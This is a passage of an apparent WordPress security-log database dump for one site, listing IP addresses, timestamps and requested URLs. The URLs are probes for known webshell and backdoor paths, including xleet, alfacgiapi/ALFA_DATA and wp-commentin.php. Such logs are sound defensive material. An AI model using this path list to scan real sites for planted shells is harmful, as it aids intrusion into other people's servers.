|0|0|equalitywalk.org.uk/patior/index.php'),('118.27.122.157',1981512349,'',0,1674161996.5548,55,'V5Aa4Hl7BzTQNLt1CPfqv083','','19|0|0|0|equalitywalk.org.uk/xleet-shell.php'),('118.27.122.157',1981512349,'',0,1674161996.6929,55,'twqv7KourZNTBWOsMPLEUAdC','','19|0|0|0|equalitywalk.org.uk/xleet.php'),('118.27.122.157',1981512349,'',0,1674161996.6936,55,'zEL8wyOxY1HtF5Dm7UfXvGsc','','19|0|0|0|equalitywalk.org.uk/xlet.php'),('118.27.122.157',1981512349,'',0,1674161996.7161,55,'AotXKYnrMJeV5px4bGgvFa9U','','19|0|0|0|equalitywalk.org.uk/takeout.php'),('118.27.122.157',1981512349,'',0,1674161996.7547,55,'FZAtb3Gmx0v95yX7WhRKaQ1S','','19|0|0|0|equalitywalk.org.uk/xleetmailer.php'),('118.27.122.157',1981512349,'',0,1674161996.7875,10,'FZAtb3Gmx0v95yX7WhRKaQ1S','','707|0|0|0|equalitywalk.org.uk/xleetmailer.php'),('118.27.122.157',1981512349,'',0,1674161997.4793,55,'O7EsLZq5wgQMUTxupGCoRFBb','','19|0|0|0|equalitywalk.org.uk/xltavrat.php'),('118.27.122.157',1981512349,'',0,1674161997.7840,55,'qpgDX1KiTdxJs4EuMQAzhae2','','19|0|0|0|equalitywalk.org.uk/shell.php'),('118.27.122.157',1981512349,'',0,1674161997.8596,55,'Jy1TgDsPxInMYOGX5d3RQKte','','19|0|0|0|equalitywalk.org.uk/sonarxleetxd.php'),('118.27.122.157',1981512349,'',0,1674161998.0076,55,'UpNvr7jVi3SnePD9d5KOZJB4','','19|0|0|0|equalitywalk.org.uk/jindex.php'),('118.27.122.157',1981512349,'',0,1674161999.0408,55,'Tk7vEwiVPb5od6F3KnQOBYm4','','19|0|0|0|equalitywalk.org.uk/admin.php'),('118.27.122.157',1981512349,'',0,1674161999.1916,55,'gcyNwz98vYl5QLaWxPj7JVqR','','19|0|0|0|equalitywalk.org.uk/xleetshell.php'),('118.27.122.157',1981512349,'',0,1674161999.1962,55,'ysJBHUtAwvXIYL9SG1PouWjh','','19|0|0|0|equalitywalk.org.uk/sh3llx.php'),('172.106.113.215',2892657111,'',0,1674164459.4143,55,'gx8ZuQdGlbpC6TeY3zBUIy2i','','19|0|0|0|equalitywalk.org.uk/xltavrat.php'),('20.244.36.78',351544398,'',0,1674178388.5658,55,'35pbZ2hj7AseBEDYNrQqkRUW','','19|0|0|0|www.equalitywalk.org.uk/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178397.3077,55,'WuoNxvDq6pQU5IcZGz39nhKe','','19|0|0|0|www.equalitywalk.org.uk/wp/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178431.0382,55,'q087V6pIW3ojzwakASsCdxLH','','19|0|0|0|www.equalitywalk.org.uk/wordpress/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178449.9890,55,'OVMJtmr78XCIpFZLbv2K1YQ3','','19|0|0|0|www.equalitywalk.org.uk/blog/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178476.6818,55,'BazRUb4iZHd2sIDcV5M0kn8m','','19|0|0|0|www.equalitywalk.org.uk/site/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178476.7409,10,'BazRUb4iZHd2sIDcV5M0kn8m','','707|0|0|0|www.equalitywalk.org.uk/site/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178615.2794,100,'9p412co8Rxs3SZCWFGJ0iaXB','','13|0|0|0|www.equalitywalk.org.uk/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178628.0410,100,'k6hNAyTnILs987wbWj1B5oGR','','13|0|0|0|www.equalitywalk.org.uk/wp/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178660.6993,100,'vtdLFN08qBApYSQhZOCabmWn','','13|0|0|0|www.equalitywalk.org.uk/wordpress/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178704.6632,100,'Z12DpsqQhJy5wlIc4LPUziBv','','13|0|0|0|www.equalitywalk.org.uk/blog/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674178723.2059,100,'OZAm1W2jPTfhkpReXVHoixMl','','13|0|0|0|www.equalitywalk.org.uk/site/wp-commentin.php'),('51.79.55.183',860829623,'',0,1674178873.1970,55,'MJBUahLZG1tcrE5yFRNxC4Al','','19|0|0|0|equalitywalk.org.uk/vim/patior/index.php'),('51.79.55.183',860829623,'',0,1674178876.9653,55,'KCV2bl6ZMuQdE7knm85OvDGy','','19|0|0|0|equalitywalk.org.uk/vim/patior/index.php'),('158.69.23.79',2655328079,'',0,1674184871.7801,55,'E5CY4B82ZlX6bzfaGFUWv1de','','19|0|0|0|equalitywalk.org.uk/wp-admin/css/colors/blue/blue.php'),('158.69.23.79',2655328079,'',0,1674184872.6740,55,'eMVcJWtiXHNwO7RljIkASK0b','','19|0|0|0|equalitywalk.org.uk/wp/wp-admin/css/colors/blue/blue.php'),('158.69.23.79',2655328079,'',0,1674184873.7840,55,'9rnqPTR4HiNsOxcVXdbfa1uJ','','19|0|0|0|equalitywalk.org.uk/wordpress/wp-admin/css/colors/blue/blue.php'),('158.69.23.79',2655328079,'',0,1674184874.8759,55,'03ZpIl75droxuPJEgS9Mmaik','','19|0|0|0|equalitywalk.org.uk/blog/wp-admin/css/colors/blue/blue.php'),('158.69.23.79',2655328079,'',0,1674184875.4870,55,'pUxMHkd6R2KGPwWtFT4ESzL3','','19|0|0|0|equalitywalk.org.uk/site/wp-admin/css/colors/blue/blue.php'),('158.69.23.79',2655328079,'',0,1674184875.6047,10,'pUxMHkd6R2KGPwWtFT4ESzL3','','707|0|0|0|equalitywalk.org.uk/site/wp-admin/css/colors/blue/blue.php'),('92.205.8.185',1556940985,'',0,1674187303.5246,55,'74YptCzlhoSgrMfUAmRbKJuy','','19|0|0|0|equalitywalk.org.uk/wp-admin/js/index.php'),('5.78.57.119',89012599,'',0,1674189976.3870,55,'teDuXQKNYWomx5UnMCJh6AfP','','19|0|0|0|equalitywalk.org.uk/abruzi.php4'),('20.244.36.78',351544398,'',0,1674191815.3306,55,'NyTQJSdIZO3tGbe5pXUVEz87','','19|0|0|0|www.equalitywalk.org.uk/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191825.8440,55,'p80o2ZnFfi3TVyYWSJDHqm46','','19|0|0|0|www.equalitywalk.org.uk/wp/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191837.6980,55,'q8vuNohYf0RBDXd2a9nTzx5U','','19|0|0|0|www.equalitywalk.org.uk/wordpress/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191845.5601,55,'Wuqj8kZQd3T5FEvMfntbpBxw','','19|0|0|0|www.equalitywalk.org.uk/blog/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191859.8702,55,'m3u5V2hjDypIgEUY7K6OBWHb','','19|0|0|0|www.equalitywalk.org.uk/site/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191859.9392,10,'m3u5V2hjDypIgEUY7K6OBWHb','','707|0|0|0|www.equalitywalk.org.uk/site/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191937.7261,100,'CK1JUQmS2rl7wufZceqxpDNM','','13|0|0|0|www.equalitywalk.org.uk/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191943.1156,100,'l4QD5ORs0CeizVca1qNonk8A','','13|0|0|0|www.equalitywalk.org.uk/wp/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191947.9124,100,'6RcQIoeDqnfuP0OlWHFwarNE','','13|0|0|0|www.equalitywalk.org.uk/wordpress/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191950.9256,100,'4oG0lhsZSCnJKdVDgMHe2w38','','13|0|0|0|www.equalitywalk.org.uk/blog/wp-commentin.php'),('20.244.36.78',351544398,'',0,1674191988.2118,100,'eVYpwh52DATMNmLXkS8fvodt','','13|0|0|0|www.equalitywalk.org.uk/site/wp-commentin.php'),('195.30.85.130',3273545090,'',0,1674198533.4627,55,'ZJiAOGleWwtj08fYrQsHyKqp','','19|0|0|0|equalitywalk.org.uk/wp-admin/evidence-family.php'),('40.117.83.110',678777710,'',0,1674201187.5597,55,'qdViyMJgB2xFE1rLQjKleOCf','','19|0|0|0|www.equalitywalk.org.uk/wp-plain.php'),('40.117.83.110',678777710,'',0,1674201187.8541,55,'tIr4zUpGSq3Je2cEyYXiLM08','','19|0|0|0|www.equalitywalk.org.uk/ogzwnsnq.php'),('40.117.83.110',678777710,'',0,1674201200.8642,55,'E7UIZCT5onjB49Sx1u0bYytV','','19|0|0|0|www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php'),('40.117.83.110',678777710,'',0,1674201201.4857,55,'fgFGRjDKVqypCPs6cmOSe0Mn','','19|0|0|0|www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected'),('194.38.20.161',3257275553,'',0,1674216886.0131,55,'91Uu0fjcsYCbnPB6Gv2lHLxi','','19|0|0|0|equalitywalk.org.uk/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php'),('192.185.2.22',3233350166,'',0,1674222605.4565,55,'6zaPBWFS3w7sbt0prTGgKAkE','','19|0|0|0|equalitywalk.org.uk/fw.php'),('103.212.229.26',1742005530,'',0,1674248320.1214,55,'Wie16QdStcH2UG5b9Dv7akPl','','19|0|0|0|equalitywalk.org.uk/wp-includes/js/tinymce/skins/lightgray/fonts/index.php'),('198.71.236.47',3326602287,'',0,1674251619.5119,55,'mMnBERyJ0ce7gr3XIkDaStxK','','19|0|0|0|equalitywalk.org.uk/wp-admin/style.php'),('198.71.236.47',3326602287,'',0,1674251619.5220,55,'4iOM7oGRZe9kcrAHbtx5Vp6X','','19|0|0|0|equalitywalk.org.uk/style.php'),('94.198.53.161',1590048161,'',0,1674257642.7383,55,'FTsuZwYjB3HL18i6A9ESCGzk','','19|0|0|0|www.equalitywalk.org.uk/wp-reset.php'),('192.185.83.247',3233371127,'',0,1674270907.4768,55,'3penom9RP7D0OzNLk2KQBbtq','','19|0|0|0|equalitywalk.org.uk/wp-admin/patior/index.php'),('142.93.104.22',2388486166,'',0,1674279810.9847,55,'Xc3FQGSfRkD6Z2p1P4TAI8Hm','','19|0|0|0|www.equalitywalk.org.uk/wp-reset.php'),('75.119.157.105',1266130281,'',0,1674279811.0169,55,'8QcgIaUfNRpkqBSLhKO25mt9','','19|0|0|0|www.equalitywalk.org.uk/wp-reset.php'),('20.14.84.163',336483491,'',0,1674292838.8238,55,'8Gw2PLyRDxU3ukQThH0tYa5d','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/css.php'),('20.14.84.163',336483491,'',0,1674293059.7604,55,'SeF3j8fKgPxOlkDZmVrUvq4n','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-class.php'),('20.14.84.163',336483491,'',0,1674293060.7429,55,'mqj9v20zPRO3olN1uKniyd5g','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/fonts/css.php'),('20.14.84.163',336483491,'',0,1674293069.3338,55,'HBvdi6WczaDnRlutYbZOS574','','19|0|0|0|www.equalitywalk.org.uk/0z.php'),('20.14.84.163',336483491,'',0,1674293071.8181,55,'xY3tN1R8Tn2BZEijGDbFWupl','','19|0|0|0|www.equalitywalk.org.uk/wp-commentin.php'),('20.14.84.163',336483491,'',0,1674293071.8812,10,'xY3tN1R8Tn2BZEijGDbFWupl','','707|0|0|0|www.equalitywalk.org.uk/wp-commentin.php'),('20.14.84.163',336483491,'',0,1674293072.7539,55,'QgCJ2zchOv8qKeDMwt1xkbXL','','19|0|0|0|www.equalitywalk.org.uk/lufix.php'),('20.14.84.163',336483491,'',0,1674293073.6367,55,'XinbSLNkrV0Gv953qWjzYBeH','','19|0|0|0|www.equalitywalk.org.uk/upl.php'),('20.14.84.163',336483491,'',0,1674293074.3733,18,'vpVqEwxWHherL83IRU1PC2Ac','','13|0|0|0|www.equalitywalk.org.uk/upl.php'),('35.183.107.9',599223049,'',0,1674295744.0543,55,'BCkwf2mUIn9rHApFONW0Yab8','','19|0|0|0|www.equalitywalk.org.uk/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295744.4348,55,'GrNqcxuFvaeik0mhMO9RbSTZ','','19|0|0|0|www.equalitywalk.org.uk/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295744.7454,55,'lU0vu8w7WjymBMrcJ46t3ZDn','','19|0|0|0|www.equalitywalk.org.uk/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295747.0679,55,'u0ociaQrNWEkJnA47PK2OFfv','','19|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295747.7474,55,'ug1hd0fCWJMUlZQcS62NBmYK','','19|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295747.9865,10,'ug1hd0fCWJMUlZQcS62NBmYK','','707|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295748.3231,100,'IJyl6Zspk3x2nDPYvS0uFMR1','','13|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295751.0523,100,'pBGQ2AXClo1qsItrjOvRKmwZ','','13|0|0|0|www.equalitywalk.org.uk/assets/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295751.3386,100,'W48DozZjMRB7dHO5KtQn9Tbh','','13|0|0|0|www.equalitywalk.org.uk/assets/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295751.6710,100,'YhRg1K5rTtSVcIMLzo2bma0k','','13|0|0|0|www.equalitywalk.org.uk/assets/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295754.0573,100,'2bHtxcOW73pedaZzsIlmT4gU','','13|0|0|0|www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295754.3657,100,'VjRQYnxyD0Thb3aIXLAcCu9o','','13|0|0|0|www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295754.7321,100,'n4q7EmGQNYy9jFBvz2USPKTD','','13|0|0|0|www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295757.3321,100,'8Jxif4Qp2jhcobsEP9BRlvgw','','13|0|0|0|www.equalitywalk.org.uk/upload/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295757.6253,100,'gxR3aWpc0F5MQ2XAVBZmk9Gr','','13|0|0|0|www.equalitywalk.org.uk/upload/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295757.9011,100,'EQZ9dRHiwmso6DWqGz5JIhb0','','13|0|0|0|www.equalitywalk.org.uk/upload/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295760.4961,100,'7Kf4x9dlUtFHLJANqZiIaDhk','','13|0|0|0|www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295760.9094,100,'jtMZRi5uWNnmwkTa4v3bEsdK','','13|0|0|0|www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295761.2205,100,'Tk3av28ZJgbMy5U7Y6u1nRrt','','13|0|0|0|www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295763.8090,100,'6Z7jwkvhbpPdREGnUfxYmiJz','','13|0|0|0|www.equalitywalk.org.uk/uploads/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295764.2778,100,'JnDuqpAOXTKS9WzsmdvIb25E','','13|0|0|0|www.equalitywalk.org.uk/uploads/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295764.6288,100,'ra5gbU8MnfZClpNiOK07my6e','','13|0|0|0|www.equalitywalk.org.uk/uploads/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295767.2395,100,'Ga65xBDwEhnFM7L2WAvcuqT1','','13|0|0|0|www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295767.5249,100,'CKrQntWc8MaueNLlhiPy5JBo','','13|0|0|0|www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295767.9354,100,'X2YJbSRKop7sQk5dCfL8mvWn','','13|0|0|0|www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295770.7429,100,'nUYxpd2ES1QXuDmOaqJrNZC9','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295771.1024,100,'t8msN75f91dl3ZycDES0Xkpo','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295771.4293,100,'OyP8VrZXzIp3cRU0TMbY6ven','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295773.8118,100,'wZNiMRkxaFcqW6ouXt34QPLg','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295774.1000,100,'MNckT7eP4SiRr0lYv3dyIfqn','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295774.4377,100,'M14dgaZsV6wAWUPltupkh83O','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295777.0034,100,'dUwmNWquME9B6f43ItF8xKCY','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295777.3168,100,'DzTgSP6FCRk0HYocVbMQU7i8','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295777.6503,100,'go9afVPUyebim6nX5YxKNERc','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295780.6415,100,'2wjazq0cO7MJSZprmVK8U4Fb','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295780.9488,100,'sRr1iKvw90npcY4Cb2PoqzGO','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295781.2390,100,'Fc1DzdRilstVauw6Uv4EO0CQ','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295812.3684,100,'Lfj5xwsTPqi7Co3AD6znWv0h','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295812.6319,100,'i5E6UDecKxhaL29qg0nbWRIw','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295812.9077,100,'QV0nhM94L5KpNRmZTSbXkoeG','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295814.9144,100,'mdPCx75LOgMQDcwrTJNtoYfb','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295815.1900,100,'U5HjMwFnaNRqxl63Q8emvy2u','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295815.5057,100,'SxgqERpr37zsa5vfiw0d96Xk','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295818.3516,100,'ykqgbG71hHvr8BMLaIxjlWFE','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295818.6716,100,'AmQl56OxUa7weEChDR8GSqZv','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295818.9267,100,'awWg4XzS8V9xcBoh01UD3nki','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295820.8688,100,'wHxdCsDn8J0BVugOQiWYkojc','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295821.1340,100,'84GwiAVMN7ROm6J2WZd5tfBj','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295821.4219,100,'lAfeVnd41gBWv80FDbYPxTtL','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295823.4194,100,'2jubFdEOZHy936Q0xBCGvU5z','','13|0|0|0|www.equalitywalk.org.uk/.well-known/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295823.7111,100,'Sa46Ay2lpD5vcR9bTFudWJrX','','13|0|0|0|www.equalitywalk.org.uk/.well-known/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295823.9876,100,'LyqrOJsEAKlQGDICV8g4ajX1','','13|0|0|0|www.equalitywalk.org.uk/.well-known/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295825.9102,100,'miqGI07btsRKgyPLoOl6pz23','','13|0|0|0|www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295826.2103,100,'w9Kb0FXapCV2hGi5qNUygorY','','13|0|0|0|www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295826.5065,100,'Amd8xv7HLoa6yE1RjPTbBfD0','','13|0|0|0|www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295828.4957,100,'Fp3NxWhrGeC6mXS0RZ1KBiDQ','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295828.8524,100,'ftquwpDOlg96IxH3rzA5dTJR','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295829.1681,100,'oBUJWthKSv8NfFRgPzuIXd3G','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295831.2235,100,'MPcD2CLTJSbBwZH4Wiqg8tIA','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295831.5330,100,'SCr81s3q4i0PNyUVDWRmIoTu','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295832.0067,100,'10dCh23uElqWoRvaXN5ApVIP','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295834.3076,100,'q426utKXZH8Lxb0mQAvEsyJS','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295834.5794,100,'C6YtRci38azNkGmBT7jUIpVh','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295834.8547,100,'X7HLbI95qQwyJd6VECUt8YZ2','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295836.8317,100,'YA7qzciWO0b1x3CvEg6kwHde','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295837.0856,100,'KGQoYVbA2zxdfgD0EL4NiPlB','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295837.3519,100,'W2uDFoJ5qR1Gk6cMnlpdPHUT','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295839.3380,100,'Ktekwu28xlcD0LWmP4h73Jyf','','13|0|0|0|www.equalitywalk.org.uk/.tmb/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295839.6039,100,'Vz59j1knZIqDXWMEQ7fRaA4y','','13|0|0|0|www.equalitywalk.org.uk/.tmb/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295839.9179,100,'qePRhrg2iksHQT6dD7ocSNZA','','13|0|0|0|www.equalitywalk.org.uk/.tmb/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295841.8821,100,'vslwZDy5TfL8IBzkq4eWXMO2','','13|0|0|0|www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295842.1769,100,'kmIzYAuZWxyU2FHEsPOf04w7','','13|0|0|0|www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295842.5229,100,'HDE9vz4TcyGnXqialeN813ru','','13|0|0|0|www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295844.5465,100,'GIEmTOvkxwrHDnZtN49SLYA2','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295844.8413,100,'wDY4B1Rb2I6dapZz0Phto9KU','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295845.1291,100,'axXL2NcDb3RkiGTdH7eZyKEs','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295847.1722,100,'HORAs5SoTjDuaQG0tcLJmfEK','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295847.4538,100,'0ln26fBTYaWERJmuxFvKgrSI','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295847.7232,100,'nlusVoPZz4U2F3i7r1IM6D5H','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295849.7295,100,'PEBwSl0dKjquYb12Tetfrv97','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295850.3968,100,'qNAp91aIK4gCuPXtRd2yxnr6','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295850.7152,100,'gABQIXwPxTK18lJWVLaDsrMR','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295852.7054,100,'8G6nWfcrOuEJjhtvzxb7Riq9','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295852.9844,100,'ZtJINufXzvV3RxTn8O0mogG9','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295853.2801,100,'Y5wczByf8SaTC26deGIoqbiU','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295855.2878,100,'ZUHYeX69W3zroxFBMRilfa7A','','13|0|0|0|www.equalitywalk.org.uk/images/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295855.5526,100,'D2NpOLwnqlGAV7hMZ1UK9Ick','','13|0|0|0|www.equalitywalk.org.uk/images/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295855.8278,100,'FhyXRmCEn1kPq9xub6IAc47N','','13|0|0|0|www.equalitywalk.org.uk/images/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295857.7833,100,'uxZXSVrc0J9NQUGC6RKHBkwz','','13|0|0|0|www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674295858.0544,100,'fp7eNmq0B5uiwozsVj8PxhZd','','13|0|0|0|www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674295858.3388,100,'9kFNP45lDKCRZ8AeTQticqdh','','13|0|0|0|www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674295860.2373,100,'vWsBDypOe